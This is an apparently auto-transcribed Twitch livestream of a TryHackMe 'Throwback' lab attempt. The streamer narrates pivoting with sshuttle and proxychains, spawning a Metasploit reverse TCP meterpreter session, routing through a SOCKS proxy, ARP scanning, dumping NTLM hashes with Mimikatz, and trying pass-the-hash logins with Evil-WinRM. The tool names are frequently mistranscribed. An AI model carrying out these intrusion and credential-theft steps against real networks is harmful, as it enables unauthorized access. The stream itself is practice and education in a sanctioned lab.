private key. Sorry, I'm just looking at the chat and trying to see what's up. I should not be fumbling around over this because it's just like, I hate that we don't have bash. I hate that SH can't be set UID. Like, I hate that it's open BSD. This literally doesn't matter. Let's just get SH shuttle set up. All right, what do we need to do? How do I use SSH shuttle? Where's a, where's Jazzimix or, yeah, Jaximus. Jaximus, I'm sorry. Yeah, I couldn't find suitors unless it's like in a different location on open BSD. So for SSH shuttle, attack our username and SSH server, 000. So we've added our user in, how does this work? Do I, I need to use SSH shuttle on my attacker machine to SSH into the victim machine and get access to the server. You don't need to install SSH shuttle on the remote server. The remote server just needs to have. All right, so I mean, I did it. Yeah, does it have, does this thing have Python? Okay, we definitely have Python and I can tell because I just broke it. So we can SSH with John, which works. Let me see what Python looks like. Yeah, yeah, we got Python in here. Easy peasy. So let's SSH shuttle attack R to John at that IP address. And I want 10, 200, 24, zero slash 24, right? And I can, oh, oh, this is asking for my local pseudo. That's weird to me. Let's see if he does it, excuse me. They'll do establish SSH connection. I just, oh, oh, oh, I need to specify an IDRSA. Can I do that really easily like this? Man, SSH shuttle with an IDRSA or private key? God damn it. SSH shuttle private key. There's gotta be a thing. Okay, you can specify your SSH command. Look at this. SSH command, SSH tag guy, that thing. Okay, so SSH that thing. No tag I, but we'll specify a SSH command hyphen. Yeah, so SSH tag IDRSA. Connected. Okay. Now what? No, no, no. I mean, honestly, me trying to ignore it would present once again, the exact same problem of Crackmap exec running and proxy chains. Proxy chains seem to be working just fine and I know we need to do it eventually again. Now I can connect the network. So can this Crackmap exec now be able to reach all this stuff? Why did that instantly die? Yeah, let me try and ping that 219 buddy one more time. He's still good. So Docker run with Crackmap exec SMB with that and a hash will give me like sweet, we're cruising along, we're going and then it'll just die. Crackmap exec is giving me a hard time. I will not deny that. Can I get back to that install page? You should only install from source if you intend to hack in the source code or submit a PR. You should be using the binaries. Yeah, man. Yeah, I really, I really should be using the binaries. Where the, let me, let me get a God damn binary. If only I stink and read that. Ubuntu latest, please dear God. Okay, that downloaded. Let's get to my little op directory. Let's get to Crackmap crack. Oh, what the fuck? Let's move downloads. CME, CME, yeah, put it in here and then let's unzip that CME Ubuntu. Good evening. How's it going? Thanks for coming to hang out. Yeah, replace everything. Why can't you release it? Move CME to CME2. Now I have H1 plus X CME and I have Crackmap exec. Please for the love of God work. It's doing it. We got it. Ladies and gentlemen, we got them. Can I, I'm gonna try this proxy chains. I'm just gonna do it. Give me just one sec. Let's do a little proxy chains. Proxy chains, proxy chains. You can type CME, no, it was Crackmap exec CME and let's use this on 219. Just to please verify that it works. What? Oh, is proxy chains just dead now? Pretty sure proxy change is just dead. Let's get back to our MSF console. It went a lot of backtracing here. This is rough, guys. This is rough. Yeah, the joys of technology. Oh man, you don't even know. We've been doing this for what, almost six hours now? This is rough. So set L host, ton zero, set L port, 4141. So we set that binary to run, set payload to windows. Yeah, yeah, metropragur. Thanks so much for sticking with me, Rittenhouse. You're crazy, by the way. And let's get a reverse TCP. Let's run that guy. And our RDP session is gone, is gone. Okay, Peter's J, and then it's throwback 317, right? Was that right? Yeah, okay. So let's get PowerShell going and let's zoom in on this guy. And we had the command run as save cred. Oh shoot, extend the lab duration. Thank you, thank you, thank you. That's a very good call. Nope. Oh, that's probably why that it's been dying is because I should, whatever. Now let's get that save cred. And user admin, Peter's J, profile, cmv.exe. Good, now let's see two users. Peter's J, Peter's J. Wait, where did we, oh, we put it in windows temp, didn't we? Yeah, that's where we put the met binary. So while we have our listener already rating and running apparently that was weird. Oh no, this is Blair. It's not, I'm just gonna run it one more time. These are both coming from Blair from the workstation but I want to be on production. Why is that not running? Why is that not running? Do I need to like kill those? Ah, ah, okay. There we go, number three. And then apparently workstation one is like really, really wanting to run this. All right. Yeah, I don't need all of these sessions of the workstation guys, thanks. I really appreciate it, but it's just not necessary for me. So use auto route, thanks. Show options, set session to three and set subnet to 10, 200, 24, zero slash 24. Perfect, do the thing. Okay, now use socks foray, search socks foray. That sets up the socks server. Good, so now we should be able to just run that. Good, okay. So 1080 is a thing and we should see this output, great. Okay, so that told me it's right, right? That told me it works. It was good. It said owned, it said pooned. So please for the love of God, do not destroy my terminal session and scan it all, please. Please. Okay, Krillix had said this might take a while. So some of these just aren't going to be real things, right? Cross your toes and fingers, chat, that was good. Yeah, some of these, now you would suggest hitting IP addresses directly. I don't know what you mean. I don't know the other IP addresses yet. Yeah, proxy change is going to make it hell, but I don't have the visibility on what other stuff is out there. Which I guess isn't a problem. Like I could do a ping scan or a ping sweep or something from another machine just to get an idea as to what's out there. But yeah, proxy change is going to make this unbearably slow. Could have arped. What is that? What does that mean? Is that like a, yeah, I don't know. I mean, I agree with you. We'll have to specify with crack map exact, with CME use a specific one. Oh, see the ARP cache. Can I do that with metterperter? ARP, Windows gather ARP scanner. Is that a thing? Yeah. Okay, CME, can you please stop? Show options, set session three. What? Oh, set our hosts 10, 224 slash zero, right? What does that do? That might help me find other machines, right? Yeah, yeah, yeah, yeah. Slower than proxy chance. Is it, is it really? I guess I should have like set verbose on. I feel like it's cruising. I don't know if it's at 79. Yeah. All right, we're finding some new ones. We're finding some new ones. Let me note this down. With metterperter ARP scanner, we found other internal IP addresses. Question is, if we're gonna be using crack map exec after this, what? Oh, and broadcast, sweet. Hell yeah, we did it. Yeah, yeah, yeah, that was awesome. That was a good call. Thanks, California. Now we have a decent idea of some IP addresses. Oh yeah, true, true. We totally could have done that on the PF sense box. That's a good call. Can I just take a look at that to see if he's a thing? Nah, it's no worries. I don't, let me, you know what? Let me do it. Because he probably has that already saved, doesn't he? ARP table. If this page loads, right? That's actually, that's not a ton. So, that was a good move doing it through metterperter. Okay, so now we have a list of IP addresses and we need to know some usernames. We only know Blair J and we only know Administrator as a hash. Do we have another? Do we have more? Can I run seatbelt one more time? Or was Mimi cats that we ran, wasn't it? I should save all this output. Like I should really save all this output. Taking all this and you can't have it. Excuse me, bring this all the way down here. Control C that, slap all this code in. Okay, so now I have a Mimi cats log and we found admin Peters and their NTLM hash. We also found, oh, this is a crossup. Peters J, Peters J, his, his NTLM hash. Let's keep track of those. So the PTAH attack, we might very well have Peter J, Blair J, Peters J, Blair J, Administrator those, what the heck? And are there others that I missed? Abnan Peters J has a local, has a clear text password. SSHD, I saw, but is not extremely useful. I don't think, are there any others? Peters J, that's the same hash that I have, right? Yeah, good. I just wanna make sure I'm not crazy. Blair J, the same hash that I have. Okay, so Peters J and Blair J should be the ones that we find, is that right? Blair J and Peters J, B-L-A-I-R-E-J P-E-T-E-R-S-J. That second one is not something that I know. Wait a second. WS01, I'm confused. Is it administrator, does that spell administrator? A-D-M-I-N-I-S-T-A. No, it's not enough characters for that. What other user might that be? Or like, I don't know what other user passwords, whatever, what other hashes I might have. Like we have that big list of usernames and sure it'd be kind of easy and stupid to throw something in, but like one, two, three. It's a nine character name, Humphrey J, or Horseman B. Yeah, how would we have found Humphrey J? Do you like loop this? Can you, I mean, obviously you can loop this. I don't honestly want to continue with that one because PF sounds logs? What? Oh, oh, okay, yeah, you're right. That's the one from task 10. I'm sorry, I completely forgot. I guess when you do this for six hours, you kind of lose track. That, oh man, you're right, that makes sense. All righty, time to do some Bloodhound. Whoo, I haven't done Bloodhound since the Sands Hall Day Hack Challenge from like last year or something. Yeah, we'll see.ca, saying like, yeah, those are excuses. Yeah, dude, Krillix, thank you so much. I really appreciate you coming to hang out. This has been a blast for me. I will absolutely put this video on YouTube. I know it's gonna be humongous, ginormous, awful, long video. I might tap out soon enough as well, but for now, I'm gonna keep drinking. We've got some time, maybe another hour, who knows, but thanks so much, Krillix. I'll see you soon. If we aren't done with this by the end of the night, we can certainly do more. I'll certainly be doing more tomorrow night and maybe Monday as well. So three-day weekend over in the U.S., good holiday stuff. Take care, buddy. Okay, yeah, we got a stable foothold on throwback WS-1. New team is in 4B, that is maybe best to enumerate what is on, oh yeah, Canada 2, excellent, awesome. As well as a new shell from passing the hash. We could do Evil Win RM without, can't we? So Evil Win RM on workstation one, which was 22. Evil Win RM, attack I, attack you, Humphreys, W. And his hash was on the firewall, this guy. Please work, maybe. Oh, no, no, no, that's gotta be a hash. Let me go, let me go. Oh gosh, this every time. Why is he, why is he doing that? Every time, why does Evil Win RM just get stuck like this? Am I just bad? I mean, I know I am, but 10, 200, 24, 222. Humphreys, W, is it Humphreys or Humphreys, Humphreys. What the heck? All right, we're just gonna copy and paste that one more time. Please connect. You have a hash. Do you need the, is that one, is Evil Win RM a lowercase h? Have I consequently created accidentally three Evil Win RM sessions that never needed to have anything? No, no, no, it's capital H. Lowercase is, yeah, yeah. Whatever, dude. Okay. Whatever. I guess Blair would be able to jump in, right? If Humphreys can't, we'll let that fade out and figure out, but we'll work with Bloodhound, I guess. Is that username spell right, Humphreys? No. Thanks, written house. That'd be why. That would be why. Yep, you're totally right. Thank you. No, thanks. Turns out I'm fading out. Humphreys, oh my God. I'm fading out at two in the morning. This is real bad. At this point, it's like I should probably stop. Did I get anything wrong with that one? I'm trying to find where I screwed it up. I don't see it yet. How much do we have left? That's the real question, because if we're at six hours right now, we don't need to do a whole lot more. I'd like to still have something for the next video, or like doing this again, so. Yeah. Let's put this away, because we've been going hard for six hours, and it's called a night. It's two in the morning here on my side. I really, really hope you guys had fun. I know I had a blast, and I'm excited to do the rest of this. Thanks so much for hanging out with me on Twitch. Before you guys sign off, I have some good, fun stuff for you, for those of you that are hanging out in the chat. I'm gonna very, very quickly drop in a try hack me one month subscription code. A quick voucher. I really, really appreciate you guys hanging out, and I cannot say it enough. I'm super duper grateful. So let me sprinkle in one try hack me voucher in the chat real quick. I'm gonna let you guys race for it, if that's what you want. Hopefully it'll be a copy and paste race. And I'm out of sync when I talk, and what you guys see. So if you wanna trigger it real quick, whatever you need to do to get your try hack me code redeemed, I think it's good. What is it? Is it track me.com? And then you go to your profile and there's like a redeem button, but thanks so much for watching everybody. I really hope you enjoyed this. I'm gonna slap this in the chat right now and try hack me voucher one month voucher code. And three, two, one. I think I sent it. Yeah, yeah, I sent it. Waiting on Twitch to trigger and figure that out. But sweet. This has been a ginormous video and it's been a ton of fun, but very, very excited to keep doing this. And I'll see you guys soon. Thanks for hanging out. This has been an absolute blast. I love you and take care. Once I get back to OBS. Good night everybody. Love you.